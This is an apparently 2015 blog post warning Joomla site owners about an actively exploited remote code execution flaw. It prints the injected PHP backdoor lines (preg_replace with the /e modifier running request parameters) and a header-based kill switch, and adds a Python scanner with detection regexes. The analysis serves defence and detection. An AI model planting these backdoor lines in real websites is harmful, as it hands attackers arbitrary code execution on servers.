There is a serious remote command execution vulnerability in Joomla that is easy to exploit and is already being exploited in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla
If you are using Joomla 3, please update immediately to Joomla 3.4.6.
Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are handled (details here), so some of your extensions might no longer work after upgrading to Joomla 3.4.7. I would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.
How to Check
I have quite a number of friends who are being hit by this.
Some signs of being attacked are as follows. Take a look at <Joomla_Root_Folder>/index.php or <Joomla_Root_Folder>/includes/framework.php. If you see any of the following in the first few lines of the code, then your site has been hit.
- The following from <Joomla_Root_Folder>/index.php:
<?php
if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}
if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}
if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
- The following from <Joomla_Root_Folder>/includes/framework.php:
<?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_FOR"], "JDatabaseDriverMysqli") !== false) exit;
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
What these lines do: the preg_replace() calls use the /e modifier, which makes PHP evaluate the replacement argument as code, so each of them is a backdoor that runs whatever PHP is sent in the named request parameter (gf, Ix, Ps, LyYE here; the names and the junk comments differ from site to site). The line in framework.php makes the site exit immediately whenever the User-Agent or X-Forwarded-For header contains JDatabaseDriverMysqli, the string the exploit payload carries in those headers, so that other attackers can no longer use the same hole once the site has been taken over. These are only the variants seen so far, and the attackers change many other files as well, so a clean-looking index.php does not by itself prove that the site is clean.
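As an added example (not code from the original post or from the Joomla project), the following Python script scans a Joomla root for the three indicators above: a preg_replace() with the /e modifier, the JDatabaseDriverMysqli check on the User-Agent or X-Forwarded-For header, and executable code inserted before the header comment of index.php or includes/framework.php. The regexes, the list of core files checked for code-before-header, and the sample files it scans are my own assumptions modelled on the snippets in the post; the sample files are constructed, not taken from a real site.

```python
"""Scan a Joomla tree for the indicators shown in the post.

Added example, not code from the original post or from the Joomla project.
The regexes and sample files are constructed to mirror the infected snippets;
the list of core files checked for code-before-header is an assumption
limited to the two files the post names.
"""
import os
import re
import tempfile
from typing import Dict, List

# preg_replace() whose pattern string ends with a modifier list containing 'e':
# PHP then evaluates the replacement argument as code, so a request-controlled
# replacement is a remote code execution backdoor.
PREG_E_MODIFIER = re.compile(
    r"""preg_replace\s*\(\s*(['"])(\W)[^'"]*?\2[a-zA-Z]*e[a-zA-Z]*\1"""
)

# The injected kill switch: exit when User-Agent or X-Forwarded-For carries
# the string the exploit payload uses, locking rival attackers out.
UA_KILLSWITCH = re.compile(
    r"""\$_SERVER\s*\[\s*['"]HTTP_(?:USER_AGENT|X_FORWARDED_FOR)['"]\s*\][^;]{0,120}JDatabaseDriverMysqli"""
)

# The two core files named in the post start with "<?php" followed directly by
# the /** header comment; anything else before the header is suspicious.
CORE_FILES = ("index.php", "includes/framework.php")
HEADER_FIRST = re.compile(r"^<\?php[ \t]*\r?\n\s*/\*\*")


def find_indicators(source: str, relpath: str = "") -> List[str]:
    """Return the indicator names found in one PHP source file."""
    hits = []
    if PREG_E_MODIFIER.search(source):
        hits.append("preg_replace_e")
    if UA_KILLSWITCH.search(source):
        hits.append("ua_killswitch")
    if relpath in CORE_FILES and not HEADER_FIRST.match(source):
        hits.append("code_before_header")
    return hits


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a Joomla root and map each suspicious .php file to its indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            relpath = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_indicators(fh.read(), relpath)
            if hits:
                findings[relpath] = hits
    return findings


# Constructed sample files (modelled on the snippets in the post), not real site contents.
INFECTED_INDEX = r'''<?php
if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}
/**
 * @package Joomla.Site
 */
'''
INFECTED_FRAMEWORK = r'''<?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_FOR"], "JDatabaseDriverMysqli") !== false) exit;
/**
 * @package Joomla.Site
 */
'''
# Legitimate-looking files that must NOT be flagged: a preg_replace without /e,
# and the real class name appearing without any header check.
CLEAN_TEMPLATE = r'''<?php
/**
 * @package Joomla.Site
 */
$slug = preg_replace('/[^a-z0-9]+/i', '-', $title);
'''
CLEAN_DRIVER = r'''<?php
/**
 * @package Joomla.Platform
 */
class JDatabaseDriverMysqli extends JDatabaseDriver {}
'''
SAMPLE_SITE = {
    "index.php": INFECTED_INDEX,
    "includes/framework.php": INFECTED_FRAMEWORK,
    "templates/protostar/index.php": CLEAN_TEMPLATE,
    "libraries/joomla/database/driver/mysqli.php": CLEAN_DRIVER,
}


def demo_scan() -> Dict[str, List[str]]:
    """Write the constructed sample site to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for relpath, body in SAMPLE_SITE.items():
            path = os.path.join(root, *relpath.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo_scan()
    for relpath, hits in sorted(results.items()):
        print(f"{relpath}: {', '.join(hits)}")
```

Run it with the Joomla root as the only argument; with no argument it scans the built-in samples, which flags index.php and includes/framework.php and leaves the two clean files alone. Note that the class name JDatabaseDriverMysqli legitimately appears in Joomla's own database driver, which is why the check only fires when it is compared against a request header on the same line. A hit on any file is a reason to restore from a backup taken before the compromise rather than just delete the lines, since the same campaign changes many other files, and the script only knows the variants seen so far.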
How to Update
Please apply the security update immediately:
- Joomla 3 and above: update to Joomla 3.4.6.
- Old (unsupported) versions 1.5.x and 2.5.x: You may apply the security hotfixes here. This article from OSTraining explains how to apply them.
Note that updating only closes the hole; it does not remove code that has already been injected. If your site shows any of the signs above, restore it from a backup taken before the compromise and then update.
Comments
Yes, it's actually quite "scary" to see so many files being changed. But no worries, if you have a full backup some time before Dec 10, restore the whole site and update your Joomla to 3.4.6, it should be fine.
Warm Regards,
/kksou